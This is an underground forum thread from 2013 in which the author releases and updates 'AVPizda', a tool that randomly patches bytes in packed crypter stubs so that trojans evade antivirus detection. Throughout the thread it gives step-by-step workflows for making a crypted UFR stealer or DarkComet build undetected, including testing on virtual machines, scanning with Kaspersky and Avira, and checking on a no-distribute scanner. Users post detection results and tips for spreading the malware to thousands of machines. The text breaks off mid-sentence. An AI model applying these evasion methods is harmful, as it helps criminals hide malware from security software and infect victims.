 |
|
SEO статьи - блог от создателя FuckAV | KOROVKA.so | Качественный VPN Service MultiVPN - PPTP/OpenVPN/DoubleVPN
| Наш Jabber-сервер расположен по адресу fuckav.in. Добро пожаловать!!! |
|
|||||||
| Статьи Раздел с интересными статьями! |
| Для того, чтобы ответить в теме, необходимо зарегистрироваться. |
|
|
Опции темы | Опции просмотра |
|
|
12-09-2013
|
#1 |
AVPizda
[Ссылки могут видеть только зарегистрированные пользователи.]
Запилил на днях прогу и решил сегодня сделать релиз для тестов. Хочу посмотреть есть ли перспективы для дальнейшего развития такого софта. Эта альфа версия, даже не бета. Поэтому ЮЗАТЬ ТОЛЬКО НА ВИРТУАЛКЕ! (Запускать софтинку нужно из-под админа.) Данная версия (v0.1.00 - Alpha) будет работать только со стабами упакованными PECompact'ом Добавил из GUI-функционала: Always On Top в системное меню Drag&Drop с обработкой ярлыков Там где нужно вводить цифры можно значения менять с помощью клавиш вверх (UP) и вниз (DOWN) при нажатии которых значение будет увеличиваться или уменьшаться на 1, а если нажимать вместе с Ctrl значение будет увеличиваться или уменьшаться на 100. (считаю что так удобнее, чем всякие там стрелочки, которые в Delphi реализованы через жопу.) Теперь немного подробнее о том, как юзать авпизденочку, вернее это даже можно назвать статьей. Для тестов понадобится паблик криптор наподобие Da Vinci (/showthread.php?t=15013), то есть криптор, у которого есть в наличии стаб. Вот этот самый стаб нужно упаковать PECompact'ом далее закриптовать *.exe файл (к примеру, билд UFR'а) и вот этот закриптованный файл уже отдать на обработку AVPizd'е Принцип работы AVPizd'ы прост, ищется сигнатура конца PECompact'а, далее определяется диапазон кода, который будет рандомно патчится и запускается механизм патчинга, при этом софт будет запускаться и проверяться на работоспособность - это также является одной из причин, почему нужно юзать AVPizd'у только на виртуалке. О быстрых настройках: (Quick Options) Number of Attempts - здесь нужно установить количество попыток патчинга и проверки на работоспособность закриптованного файла. Т. е. выбирается рандомно из диапазона кода смещение в файле и патчится случайным значением и запускается, это процесс будет повторяться столько раз сколько указано в Number of Attempts. Time-out Interval (ms) - здесь нужно установить время в миллисекундах в течение, которого будет определяться, отработал ли закриптованный файл нормально или нет. К примеру, для закриптованного билда UFR'а достаточно 2000 (2 секунд), но на данный параметр могут влиять различные нюансы такие как, например железо (если комп мощный, то это значение может быть 500 или даже 150) или задержка у трояна после старта и т. д. В окно Log будут сваливаться гуды, но хотелось бы отметить тот факт, что вся информация дублируется и сохраняется в файлы Patch.log Формат следующий: Название файла, смещение в файле, старое значение байта, новое значение байта (то, что в скобках указывается в десятичном варианте, а то, что без скобок в шестнадцатеричном варианте). В статус строке появляются сообщения об ошибках или каких-то событиях. При нажатии на кнопку старт запускается процесс патчинга, но в любой момент можно этот процесс остановить, нажав на кнопку стоп. Теперь о настройках: В Captions можно добавлять названия заголовков тех окон, чьи процессы нужно убить, если они появляются в результате запуска при тестировании закриптованных файлов. Стоит также отметить, что можно использовать часть названия заголовка окна процесса, которого нужно убить. Например: если заголовок окна 006.pecompact_result3150.exe, то можно написать pecompact_result3150 и все окна, имеющие в заголовке такую строку, будут убиты. Также в этот же раздел нужно добавлять те названия заголовков окон которые будут выступать как факт того что крипт отработал нормально, к примеру, это может понадобиться, если для чистки и тестов криптуется какой-нибудь HelloWorld или Calculator. Проверяться будут все названия заголовков, но если какие-то не нужны, то их можно отключить на время сняв соответствующую галочку. В Error Captions можно добавлять названия заголовков тех окон, которые появляются в процессе ошибок при запуске. В качестве примера можно увидеть частенько окна, которые будут появляться с заголовком Application error - это окно появляется в результате ошибки при распаковке PECompact'а, но при этом формально системной ошибки или падения тестового сэмпла нет. Для того чтобы такие файлы не попадали в гуд, нужно названия заголовков таких окон добавлять в Error Captions. Error Captions - имеет более высокий приоритет, чем Captions. После того как AVPizda закончит свою работу в папке рядом со стабом появится папка tmp001 в ней и будет находиться все файлы, если папка tmp001 уже существует то будет создана tmp002 и т. д., таким образом можно дрочить до бесконечности... В папках tmpXXX будут находиться гуды и файл Patch.log, в котором будет инфа о том, какой байт пропатчен (смещение в файле, старое и новое значение байта). То, что в скобках указывается в десятичном варианте, а то, что без скобок в шестнадцатеричном варианте. В папке также будет появляться папка bad, в ней будут все файлы, которые при запуске выдавали ошибки, а также файл Patch.log После проверки папки tmpXXX антивирусами, оставшиеся файлы и есть те, которые нужны, далее в файле Patch.log находим эти файлы и патчим в Hex-редакторе по смещению в фале теми значениями, которые будут в этом файле. После проверки будет оставаться мало файлов и пред тем как патчить в Hex-редакторе лучше их на всякий случай перепроверить и запустить повторно, чтобы убедится, что все работает. Подведем итоги: На данном этапе это просто тестовый вариант, поэтому выслушаю предложения по улучшению юзабильности, а также идеи о том, что нужно добавить, убрать или изменить из функционала. У меня, к сожалению, не так много есть свободного времени на подобные тесты. Но в результате проделанных тестов, заметил закономерность, что из 10 попыток в среднем получается один рабочий вариант. Сделал 200 попыток, получил 19 рабочих вариантов, проверил все файлы Kaspersk'им все рабочие файлы задетектились и около 50 из папки bad оказались чистыми, но они не рабочие. Х.з. может, если сделать 1000 попыток что-то и почистится... Короче считаю такие FUD чистки - это реальное дрочево (по-другому и назвать-то не могу), даже если почистится, то при первом же прогрузе на трафе в 3-5k такой крипт умрет, не успев появиться из авпизденочки. Посмотрел этот хваленый почищенный стаб Da Vinci, который чистым продержался месяц, оказалось, что там пара байт запатчены так, что на большинстве компов закриптованный файл будет не рабочим. Kaspersk'ий (как и многие другие) естественно будет показывать Ok, так как стаб бажный, ему нужен реально рабочий, только в этом случае он покажет реальный результат. Avira не палит из-за того самого единственного..., кстати я добавил в AVPizd'у этот "волшебный патч", так что пока Avira не закроет этот байт, она будет в большинстве случаев выдавать что файл чистый. Добавлено через 88 часов 52 минуты [Ссылки могут видеть только зарегистрированные пользователи.] Добавил из GUI-функционала: Сворачивание в системный трей (включить можно в настройках) Drag&Drop папок (для тестового режима) Добавил пиздОиконку. Улучшено: В окне Log'а в конце будет выводиться результат в формате Good: 10; Bad: 100. Теперь в файлы логов (в режиме Patch) вся инфа пишется сразу. В статус строке показан текущий режим. Немного оптимизировал механизм патчинга и теперь по идее должен в 2 раза лучше "чистить" стабы упакованные PECompact'ом. (рекомендуемое количество попыток не менее 20) Пофиксил пару мелких баг. Добавлено: Новый режим Test, который позволяет тестировать *.exe файлы в выбранной папке. Чтобы включился тестовый режим - нужно просто выбрать папку (кнопка [...] или перетащить папку на окно AVPizd'ы), в которой будут находиться файлы, которые нужно проверить на работоспособность. В режиме тестирования никаких файловых логов не ведется, гуды записываются в окно Log'а и в конце выводится результат тестов. Если ничего не выбрано, то при нажатии на кнопке Старт будет появляться окно для выбора стаба (режим Patch), если нажать Отмена, то появится окно для выбора папки (режим Test). Теперь в окне Log'а (в режиме Patch) будет появляться предупреждение о том, что нужно установить подходящее значение Time-out Interval. (скорее всего его нужно увеличить.) Теперь немного подробнее о режиме Test: Этот режим нужен для того чтобы проверить файлы на работоспособность. К примеру, нужно проверить те файлы, которые "чистились" прогой Chameleon Offset Locator. Если стаб чистится от одного антивируса, то тут лучше проверить папку с файлами вначале антивирусом, а уже после этого оставшиеся файлы проверить на работоспособность AVPizd'ой. А вот если чистка делается от нескольких антивирусов (допустим от трех Avira, Kaspersky и Dr.Web), то тогда нужно проверить папку с файлами вначале AVPizd'ой, удалить папку bad и сделать копии папок с файлами для каждого антивируса. Далее уже проверять каждую папку своим антивирусом. Стоит отметить, что чем меньше значение Time-out Interval, тем больше гудов будет попадать в папку bad, но процесс тестов по времени будет быстрее. Если Time-out Interval будет большим, то тогда процесс тестов по времени будет медленнее, но процент того что гуд попадет в папку bad будет низким. Последний раз редактировалось Multik; 16-09-2013 в 15:10. Причина: Добавлено сообщение |
|
|
|
|
23-09-2013
|
#2 |
|
Re: AVPizda
Улучшено: Оптимизировал алгоритм проверки на работоспособность файлов. Теперь по идее можно будет, полностью проигравшись с параметрами Time-out Interval (ms) и Delay (ms) сделать так чтобы в папке оставались только рабочие файлы. Добавлено: Delay (ms) - значительно расширил возможности проверки на работоспособность файлов. Patcher - инструмент (вызвать можно, нажав на кнопку Patcher), который позволяет патчить, при этом не нужно теперь лазить в Hex-редакторе и хуйней страдать с адресами и значениями. Теперь немного подробнее о Time-out Interval (ms) и Delay (ms): Если закриптован для тестов был HelloWorld, то нужно Time-out Interval установить в 0, а параметр Delay установить таким, чтобы появлялось окно HelloWorld, а в Captions прописать название окна HelloWorld'а. Если закриптован для тестов был билд UFR'а, то нужно в Delay установить значение такое, чтобы троян успел произвести инициализацию, а в Time-out Interval нужно указать значение, которое будет указывать на то, что троян отработал нормально. Вообщем с помощью этих двух параметров можно оптимально добиться нужных результатов. Еще также хотелось бы отметить тот факт, что обязательно нужно проверять на работоспособность вручную перед прогрузом, мне во время тестов попался даже вот такой вариант: Формально тестируемый файл работает, нет ни падений, не сбоев и даже кнопочка OK работает, но окно... окно, непонятно какое. Все же подобные чистки могут непредсказуемым образом влиять на работу файлов, может даже быть, что на одном компе работает нормально, а на другом вообще может и не работать. Теперь немного подробнее об Patcher: Все очень просто, после того как будет проверена папка антивирусом, нужно открыть окно Patcher, нажать на кнопку Load... и выбирать файл Patch.log. Появится примерно следующее окно: Выставляете на нужных патчах галочки и жмете кнопку Patch, далее выбираете стаб, который нужно пропатчить и вуаля, теперь можно проверять на http://scanner.fuckav.ru/ или на проверенных Scan4you, Chk4me... Гы-гы, ладно я помню, что спонсором http://scanner.fuckav.ru/ является avdetect.com поэтому будем считать его лучшим. И это не просто слова, а действительно уже доказано временем, что avdetect.com заслуживает занять почетное первое место среди остальных подобных сервисов на данный момент времени, но времена меняются, конкуренция в данной области есть... В Patcher'е есть Result - это важное поле, в нем появляются результаты для каждого патча и если вдруг начнут появляться среди результатов Error'ы, то это значит что вполне возможно, что был выбран какой-то левый стаб! Все остальное это нормально, показывают выполненные операции. Патчить можно один стаб сколько угодно раз и экспериментировать различными вариантами - какие-то патчи отключать, а какие-то включать. Допустим если установить галочки у всех патчей и пропатчить, а после этого снять у всех галочки и пропатчить, то стаб станет таким как будто его и не патчили. Skiped - это означает, что было пропущено действие. (это происходит в тех случаях, когда не нужно что-то делать.) Patched - это означает, что пропатчено. (старое значение заменено на новое.) Restored - это означает, что было восстановлено. (новое значение заменено на старое.) Все ниже описанные действия нужно проделывать на виртуалке или на дедике. Берете стаб, пакуете его PECompact'ом. Криптуете *.exe файл (к примеру, билд UFR'а) Открываете его в AVPizd'е, устанавливаете Number of Attempts равный 600, в настройках прописываете заголовки (если требуется). Настраиваете Time-out Interval (ms) и Delay (ms) так чтобы в папку tmpXXX попадали только гуды. И жмете кнопку Start. Ждете, пока закончится процесс так называемой чистки... Рядом с *.exe появится папка tmpXXX. В ней нужно удалить папку bad. Далее делаете копии этой папки, копий нужно сделать столько, сколькими антивирусами собираетесь проверять. Проверяете антивирусами. Оставшиеся файлы и будут те, которые убивают детекты. Далее в Patcher загружаете Patch.log, выставляете на нужных патчах галочки и патчите. Проверяете на http://scanner.fuckav.ru/ или avdetect.com. Повторяете этот процесс до бесконечности, чтобы добиться нужного результата. Скачать: [Ссылки могут видеть только зарегистрированные пользователи.] О возникающих проблемах в работе программы сообщаем в этом топике, желательно с небольшим описанием и по возможности приложить скрин, если это требует какая-та ошибка. Программу НЕ ЗАПРЕЩЕНО использовать в коммерческих целях! Вообще чистить стаб за деньги подобным образом - это бред, проще криптануть у кого-нибудь за те же деньги, а вот чистить софт который трудно криптуется, вот тут да-а... резонно. Я даже как-то сталкивался с подобным, есть троян один - он старый, но еще даже сейчас актуальный (правда с хромом там все запущенно), так вот автор этого троя, еще несколько лет назад делал чистки подобным образом и брал за это по 30-40 баксов, мне один чел рассказывал, что у него с такими вот чистками неделями троян жил, правда, трой тот был dll, а мы все знаем, что для dll трудно найти хороший криптор... |
|
|
|
|
|
06-10-2013
|
#3 |
|
Re: AVPizda
А если после скана ав неостался не один файл ?
Добавлено через 18 минут И что делать если после сжатия стаба в итоге криптованный файл сжатым стабом выдает следующее: Добавлено через 1 час 0 минут 3. Запаковал стаб, пропатчил его после всех действий, ав отсеялись. --> после когда пропатченый стаб выбираю софтиной такая вот ошибка: Стаб запакова Пекомпактом! Последний раз редактировалось Аноним; 06-10-2013 в 20:59. Причина: Добавлено сообщение |
|
|
|
|
10-10-2013
|
#4 | |||
|
Re: AVPizda
Цитата:
Там значения рандомные и поэтому вариантов может быть много, а точнее ~140250. Чтобы сделать FUD - 600 попыток это о-о-очень мало. (для этого я и сделал создание tmpXXX папок) Чтобы "почистить" скорее всего, нужно будет 1-2 часа "брута". Самый быстрый способ - это пробовать разные крипторы, к примеру, вот на момент тестирования Zeus private crypter нормально так чистился, прям слету от нескольких AV, но времени уже много прошло и сейчас этот криптор уже, наверное, неактуален. Думаю, как вариант можно смотреть раздел крипторов и брать оттуда новые и пробовать чистить - все равно там максимум пару дней и криптор умрет, а вот попробовать почистить данным методом есть хоть какой-то резон, вообщем на одном крипторе не надо циклицца. Вообще у меня есть идея попробовать добавить вариант патчинга 2 или даже 3 подряд идущих байта, есть шанс, что это увеличит процент чистки, но гудов будет меньше... Еще когда смотрел (минут 20-30) криптор AegisCrypter (версию криптора не помню), там оказалось что детект идет у авиры не сигнатурный, а эвристический - видимо важным является размер закриптованного файла... Короче тут нужно делать тесты, а у меня нет времени на это. Цитата:
А вообще если появляются окна после запуска с заголовками: Код:
Application error Точка входа не найдена Ошибка приложения Это те заголовки окон, которые попадались мне во время тестирования и их также нужно добавить в Error Captions Цитата:
После того как стаб был пропатчен, существует вероятность того что пропатчится участок который является частью сигнатуры. Поэтому не рекомендую после того как будет пропатчен стаб "чистить" его повторно. Для этого, как вариант, можно - после того как копии папок или несколько разных папок будут проверены различными антивирусами, патчить можно один и тот же стаб поочередно выбирая Patch.log из разных папок, но при этом могут появляться в результатах error'ы - это будет означать что уже до этого был пропатчен этот байт по этому смещению в файле и тут уже нужно смотреть конкретно - в каких-то патчах галочки включать, а в каких-то выключать... |
||||
|
|
|
12-10-2013
|
#5 |
|
Re: AVPizda
Multik, можешь из исходников этой программы сделать "генератор" стабов: например, загрузили криптованный анотатор в эту прогу, он изменил 1501 офсет и анотатор не сломался, запоминаем, потом перепрогоняем файл с учетом предыдущего шага и спустя определенное время получаем полностью видоизмененный беспалевный анотатор, делаем те же патчи на стаб и вуаля - фуд (а может и не фуд, но большинство аверов отсеяться должно).
|
|
|
|
|
17-10-2013
|
#6 | |
|
Re: AVPizda
Цитата:
Добавил: Таймер в статус строку - показывает время, затраченное на "брут". Кнопку About - куда ж бля без нее (кстати, все-таки небольшая польза от этого все же есть), лицензию и прочую ебань я не собираюсь добавлять - это удел буржуйчеков пиарить свои говноники. Drag&Drop Patch.log'а на окно Patcher (ярлыки тоже можно) Size Of Patch - можно выбрать размер патчинга 1, 2, 3 или 4 байта. Еще как вариант есть рандом. Рекомендуемый размер 2 байта, но остальные тоже как вариант имеют право на жизнь, но у них процент гудов очень низкий. На 3-х или 4-х байтах у меня во время тестов с 100-ни получалось 2-4 работоспособных варианта. В патчере добавил еще одну колонку, которая показывает порядковый номер патча, че-т мне кажется так удобнее. (на скрине ниже показано) По-поводу 3-х или 4-х байтового патчинга, существует вероятность того что смещения в файле будут "залазить" друг на друга (на скрине ниже показано что по смещению с 151015 по 151018 (размер патча 4 байта) уже патчилось, а 151018 как раз попадает в этот диапазон), в этом случае будет появляться в результатах «Already patched!», вообщем нужно будет отключать или включать патчи, в зависимости от результатов сканирования папок антивирусами. Теперь error в результатах будет появляться только в критические "дни". Фикс бага. Забыл в патчере добавить 3 строчки кода, и из-за этого пизденочка не работала с копиями папок. Скачать: [Ссылки могут видеть только зарегистрированные пользователи.] Теперь о тестах: Выбрал наугад в разделе крипторов криптор Lineage Crypter By Janpr99 - Mod by ard [FUD] Запаковал стаб PECompact'ом. Закриптовал для тестов HelloWorld и пропустил два раза через AVPizda с параметрами Number of Attempts = 100, а Time-out Interval (ms) = 0 и Delay (ms) = 500. (криптор с какой-то задержкой и поэтому Delay получился таким большим.) Один тест делал с Size Of Patch = 1 (то есть, как это было раньше), а вот второй делал Size Of Patch = Random. Таймер показал, что около пары минут на каждый из тестов ушло. с Size Of Patch = 1 выбило 17 патчей. (и это за пару минут, а я уверен, что если бы криптор был без задержки, то все было бы значительнее быстрее) Но вот проблема возникла при патчинге, по отдельности каждый из патчей работает, а вот когда пропатчил все - получил падение HelloWorld'а. Методом тыка (вначале пять патчей пропатчил, потом еще пять и так далее) быстро нашел проблемный патч, из-за которого падал HelloWorld. Далее второй тест делал уже с Size Of Patch = Random - выбило 14 патчей, получилось некое ассорти, были патчи размером и 1 (5 патчей) и 2 (5 патчей) и 3 (2 патча) и 4 (2 патча). На втором тесте такая же проблема была, также попался проблемный патч, из-за которого падал HelloWorld. Методом тыка быстро нашелся. Плюс пару патчей залазили друг на друга (Already patched!) Для проверки на работоспособность всех патчей - лучше проверять на копии HelloWorld, которая также копируется в папку tmpXXX, убедившись, что все работает - только после этого патчить стаб! Антивирусами папки не сканил, хотел посмотреть на результаты без этого дроча. Проверил на http://scanner.fuckav.ru закриптованный билд UFR'а криптором Lineage Crypter в чем его две мамы (Janpr99 и ard) родили и получил: Код:
11 из 36 Avast: Win32:Evo-gen Susp AVG: trj.Inject.CCCS Bitdefender/BullGuard: Trojan.Generic.9711986 BullGuard Internet Security 2013: Trojan.Generic.9711986 Dr.Web: BackDoor.Cybergate.3805 F-Secure: Malware detected G Data: Virus: Trojan.Generic.9711986 (Engine A) Kaspersky Internet Security 2013: Network: Trojan.Win32.Llac.dojj NOD32: @Trojan.Win32/Injector.AOFX Outpost Security Suite Pro 8.0: Trojan.Llac!bqRR8HfVqyk (Trojan) Twister Antivirus 8: Trojan.Injector.AOFX.jlyc Потом проверил так называемый почищенный закриптованный билд UFR'а с Size Of Patch = 1 И получил: Код:
5 из 36 Avira: TR/Crypt.PEPM.Gen Trojan! ClamAV (UNIX version): PUA.Packed.PECompact-1 Dr.Web: BackDoor.Cybergate.3805 Kaspersky Internet Security 2013: HEUR:Trojan.Win32.Generic NOD32: Malware detected И получил: Код:
3 из 36 Avira: TR/Crypt.PEPM.Gen Trojan! ClamAV (UNIX version): PUA.Packed.PECompact-1 Kaspersky Internet Security 2013: Trojan.Win32.Llac.dojj Из результатов видно, что Size Of Patch = Random показал лучше результаты, чем Size Of Patch = 1. (не знаю, может это случайно так получилось, тут какбэ нужно значительно больше тестов делать) При этом с Size Of Patch = Random появляется практически бесконечная возможность различных вариантов, что позволит данному методу "чистки" еще долго существовать - IMHO. Получается надо локально на комп ставить Kaspersky и Avira - этими антивирусами сканить папки и получив фуд от этих антивирусов, далее проверять на http://scanner.fuckav.ru И че-т та метода с убиванием авиры при помощи магического байта как бы уже и не работает. |
||
|
|
|
|
17-10-2013
|
#7 |
|
Re: AVPizda
Multik, зачем такая насильная привязка к ПЕкомпакту? Поработала программа пару минут и вылетела, пропатчил стаб, 3 авера отсеилось, гружу криптованный анотатор снова в прогу и после нажатия кнопки "Start" начали сыпаться ерроры что не пожато ПЕкомпактом.
|
|
|
|
|
28-10-2013
|
#8 | ||
|
Re: AVPizda
Изменил статус проги на Beta.
Завернул предположительно проблемные участки кода в try..except, по идее теперь должно меньше падать и в логе может появляться FatalError, если таких сообщений будет появляться очень много, то тогда сохраняйте данные из лога в текстовой файл и вместе с проблемным exe-файлом ко мне в ПМ (желательно небольшое описание "телодвижений"), я посмотрю и попробую исправить возникшие проблемы. Добавил: ProgressBar в статус строку - позволяет определить примерно, сколько осталось до конца "брута". С этим ProgressBar'ом ебля получилась, вроде с первого взгляда тривиальная вещь, чтобы его добавить, но как оказалась... пару часов дроча и постоянное падение при закрытии проги, уже хотел забить на это дело, но случайно нашел место, куда засунуть код, чтобы все заработало. Но с-сука до слез было обидно за потраченные пару часов впустую... В настройках появилась возможность настроить генерируемое имя файла (в режиме Patch), посчитал, что это лишним не будет, тем более что во время тестов была пара моментов, когда реально понадобилась данная возможность для достижения нужных результатов. Да и вообще для информативности полезно будет... Из меню можно выбрать зарезервированные переменные, которые будут вставлены в место, где находится курсор или вместо выделенного текста. Вместо этих зарезервированные переменных при формировании имени файла будут вставлены данные соответствующие названию переменных, думаю, что из названий понятно, что чему соответствует, но всегда можно поэкспериментировать + есть окно Preview в котором можно видеть конечный результат. Некоторые символы запрещены для ввода. Кому не нужна данная опция, можно вообще ничего не настраивать... Но я рекомендовал бы обратить внимание на данную возможность и использовать ее. Убрал этот бесполезный патч KillAvira, но вместо него добавил "220-550". Вначале, конечно же, сделал предварительные тесты - касперыча "убило" наповал (ЛОЛ), при этом криптор вообще не использовал, а просто тупо запакованный билд UFR'а пропустил через приватную пизденочку. Если честно не верил что почистится, но против фактов не попрешь. Можно было адресный патч сделать типа как KillAvira, но ряд фактов все же повлияли на то, что решил добавить диапазон адресов, если быть более точным то патчится диапазон в PEHeaders начиная от сигнатуры PE в IMAGE_NT_HEADERS и заканчивая IMAGE_SECTION_HEADERS. Думаю многие смогут представить в какое дерьмо может превратиться PE-формат после патчинга... Если кому-то не нужны такие патчи, допустим Avira вряд ли заткнется или даже наоборот начнет орать после такого непохека, то можно убрать такие патчи настроив генерацию имен фалов, сортировкой по адресам и удалением таких гуд-фалов из папки. Еще добавил в Patcher сохранение состояния включенных и выключенных патчей для каждого патч-лога. При тестировании просто нереально возникла необходимость в такой фиче, особенно это актуально когда попадаются в гудах говнопатчи и патчится тестовый файл несколько раз, при переносе таких вот патчей на стаб и возникает нужда в сохранении состояния. Ну и теперь, пожалуй, самое главное, то чего я не мог осознать, пока меня не тыкнули носом в этом топе пара человек. Цитата:
Цитата:
Вообще с этим поиском интересная ситуация получилась, в первых версиях в этой функции была бага, я попутал и вместо Length написал SizeOf и в результате длина сигнатуры стала 4 байта вместо 15. Потом я при оптимизации кода заметил и исправил, но как выяснилось, это ухудшило юзабельность. Сделал тесты и пропатчил 7 раз "подряд" - вроде сообщение Error: "..." is not packed. (PECompact) не выскакивало, но в какой же дерьмо-фарш превратился код PECompact'а словами просто не передать и это еще как-то правильно все работает... Вообщем на данном этапе больше склонен к тому, что у этого софта есть перспективы. И, пожалуй, тему надо поплотнее изучить и больше тестов сделать... Скачать: [Ссылки могут видеть только зарегистрированные пользователи.] =========================================== Добавлена поддержка криптора AegisCrypter Данная версия работает только со стабами упакованными PECompact'ом Скачать: [Ссылки могут видеть только зарегистрированные пользователи.] Стабы можно скачать из этого топа: /showthread.php?t=16040 Последний раз редактировалось Multik; 31-10-2013 в 02:59. Причина: обновление программы |
|||
|
|
|
|
28-10-2013
|
#9 | |
|
Re: AVPizda
Цитата:
|
||
|
|
|
23-12-2013
|
#10 |
|
Re: AVPizda
Не совсем понял как в новых версиях патчить AegisCrypter, стаб не сжимается с помощью PECompact ( Error ). Если не сжимать, то после криптовки AVpizda орет, что не запакован и отказывается работать. Как с аегисом быть? А так зашибись, +
|
|
|
|
|
23-12-2013
|
#11 | |
|
Re: AVPizda
Цитата:
|
||
|
|
|
|
27-12-2013
|
#12 | |
|
Re: AVPizda
Цитата:
Спасибо! Все отлично работает. Только для других, не повторите мою ошибку и делайте так: Сначала снимаете защиту со стаба ( Decrypt Stub ), потом сжимаете его PE компактом, а потом опять СТАВИТЕ защиту на файл! Не забудьте, или Aegis заноет Детект DarkComet + Aegis + AVPizda Название файла: 0043.ae.exe Размер файла: 827320 байт Дата сканирования: Fri, 27 Dec 13 17:02:03 -0500 MD5-хэш файла: 4d75ca2cd544b7a27360c1f76356dd3f Результат: 13 из 36 Ad-Aware: Trojan.Win32.Injector.arxk (v) AhnLab V3 Internet Security: OK ArcaVir: OK Avast: Compact L Win32:Crypt-QGA Trj AVG: trj.Generic35.AJPM Avira: OK Bitdefender/BullGuard: OK BullGuard Internet Security 2013: OK Comodo: OK Dr.Web: Trojan.DownLoader9.22851 Emsisoft Anti-Malware (a-squared Anti-Malware): OK eScan Internet Security Suite 14: OK Fortinet 5: OK F-Prot: OK F-Secure 2014: OK G Data: Virus: Win32:Crypt-QGA Trj (Engine B) IKARUS: Virus.Win32.CeeInject Immunet/ClamAV: OK K7 Ultimate: OK Kaspersky Internet Security 2014: HEUR:Trojan.Win32.Generic McAfee Total Protection 2013: OK Microsoft Security Essentials: Backdoor:Win32/Fynloski.A NANO: PECompact2 (Trojan.Win32.DarkKomet.cqiote NOD32: @Trojan.Win32/Injector.ARXK Norman: win32:winpe/Inject.BHUR Norton Internet Security: OK Outpost Security Suite Pro 8.0: OK Quick Heal: OK Sophos: OK SUPERAntiSpyware: OK Total Defense Internet Security: OK Trendmicro Titanium Internet Security: OK Twister Antivirus 8: OK VBA: Malware detected VIPRE Internet Security 2013: Trojan.Win32.Injector.arxk (v) Virit: OK Scan report generated by Scanner.FuckAV.ru Не плохо так из почти 100% детекта Есть смысл гонять AV-пизду по второму разу. После 5-ти проходов AV пиздой каждого нового работающего файла детект сбился, перестала палить эвристика касперыча. Но как?! Подозрительно и файл стал отстукивать после второго запуска. Что за? Название файла: cr.exe Размер файла: 827320 байт Дата сканирования: Fri, 27 Dec 13 17:08:30 -0500 MD5-хэш файла: 41d71ecdc1984ef0fc8af716444c9271 Результат: 11 из 36 Ad-Aware: Trojan.Win32.Injector.arxk (v) AhnLab V3 Internet Security: OK ArcaVir: OK Avast: Win32:Evo-gen Susp AVG: trj.Generic35.AJPM Avira: OK Bitdefender/BullGuard: OK BullGuard Internet Security 2013: OK Comodo: OK Dr.Web: Trojan.DownLoader9.22851 Emsisoft Anti-Malware (a-squared Anti-Malware): OK eScan Internet Security Suite 14: OK Fortinet 5: OK F-Prot: OK F-Secure 2014: OK G Data: Virus: Win32:Crypt-QGA Trj (Engine B) IKARUS: Virus.Win32.CeeInject Immunet/ClamAV: OK K7 Ultimate: OK Kaspersky Internet Security 2014: OK McAfee Total Protection 2013: OK Microsoft Security Essentials: Backdoor:Win32/Fynloski.A NANO: PECompact2 (Trojan.Win32.DarkKomet.cqiote NOD32: @Trojan.Win32/Injector.ARXK Norman: OK Norton Internet Security: OK Outpost Security Suite Pro 8.0: OK Quick Heal: OK Sophos: OK SUPERAntiSpyware: OK Total Defense Internet Security: OK Trendmicro Titanium Internet Security: OK Twister Antivirus 8: OK VBA: Malware detected VIPRE Internet Security 2013: Malware detected Virit: OK Scan report generated by Scanner.FuckAV.ru Последний раз редактировалось IBM; 28-12-2013 в 00:19. |
||
|
|
|
|
20-12-2013
|
#13 |
|
Re: AVPizda
С файлами работает нормально,но при этом заставляет windows ребутиться через 5-10 минут после запуска.
Прописал заголовки работающих и битых программ,но ситуация не изменилась. Windows стоит под VirtualBox'ом,оперативки на 1 гб,в чем может быть проблема не представляю. |
|
|
|
|
18-01-2014
|
#14 | ||||
|
Re: AVPizda
Цитата:
Это может происходить из-за запуска бажного exe в результате чего система вызывает системный процесс для того чтобы обработать ошибку (а может даже вызывать и отладчик) и видимо по мере накопления очереди этих процессов может давать сбой. Я при тестах замечал, помню, что некоторые процессы AVPizda не может убить, видимо из-за этого... Цитата:
Я когда-то давно видел на одном форуме негативные отзывы об этой VM (скажем так еще на этапе ее зачатия), и решил ее не юзать... да и вообще все как-то так сложилось что юзаю постоянно VMware... Но вот тут на форуме увидел одну тему и решил попробовать этот VirtualBox, подкупил VirtualBox меня тем, что пожатый диск с установленной Windows XP SP3 весит всего 300 mb., когда как VMware более 600 mb. Вообщем установил систему и при первом же запуске на ней XtremeRAT 3.6 начал дико тормозить всю систему, но при сворачивании окна система стабилизировалась, поюзал немного и понял что многое там сделано отвратительно в плане юзабельности, короче удалил VirtualBox. Потом помню, через некоторое время (там че-т полгода прошло) скачал новую версию VirtualBox и попробовал запустить XtremeRAT 3.6 еще раз и о чудо эта проблема исчезла, решил понять причину такой проблемы, но когда глянул на челенжы и сколько там сделано было фиксов с того времени, понял что это просто не реально понять - удалил VirtualBox и теперь вряд ли меня что-то заставит установить эту VM еще раз... Рекомендуемая для тестов VM - VMware, а система - Windows XP SP3. + HelloWorld (программа, которая показывает просто MessageBox) На Windows 7 тестить нужно только когда "почищенный" файл нормально отработал на Windows XP, я вообще думаю, что не стоит юзать AVPizda на Windows 7, так как эта система (кроме пожирания ресурсов) ничем "не отличается" от Windows XP. Цитата:
Вполне возможно, что кто-то и смог добиться FUD'а, но тупо помалкивает, создавая тем самым стагнацию софта. Судя по результатам DarkComet + Aegis + PECompact + AVPizda и тому, что не было ни одного релиза стаба - можно сделать вывод, что тема Aegis + PECompact + AVPizda не юзабельна. Цитата:
Поэтому AVPizda нужно при тестах юзать обязательно только на VM! Долго думал, что с проектом делать и решил, скорее всего, пойти по пути монетизации... У нас в крови генетически заложено, так что если кто-то что-то сделал, то для народа эта "народная самодеятельность" должна быть бесплатна. Есть даже элитные проповедники, которые постятся на форумах с проповедями о том, что коммерция - это зло. При этом сами ни чего не делают полезного, а только троллят безбожно почесывая свой ЧСВ. Но есть и обратная сторона медали - наш народ никогда не станет делать что-то бесплатно. Попробуй, заставь этих проповедников что-то для народа сделать (бесплатно), к примеру, какой-то годный 0-дей релиз сделать. Ясен пень они не смогут этого, потому что пиздеть только могут, а цену потраченного времени и сил на то, что делается для народа, они естественно не ценят, да и не знают что это такое... Сейчас встала острая потребность сделать справку в формате *.chm для AVPizda , у меня на это времени нет. (Можно, конечно же, примитивно скопипастить из топа инфу, но это не есть тру, хочется чего-то творческого...) Чтобы кто-то стал делать такую справку бесплатно - я не верю. (Или все же из элиты найдется тот, кто сделает?) Можно, конечно же, (в качестве бесплатного бонуса) в About добавить имена тех, кто будет принимать активное участие в разработке софта, что может придать многим стимула и увековечить свое имя став тем самым примером для будущего поколения... Да и когда что-то делается бесплатно - это будет очень медленно, да и есть большой шанс, что чел недоделав что-то - соскочит, или даже скажет: - юзайте то, что дают, потому что бесплатно. Но вот если предложить 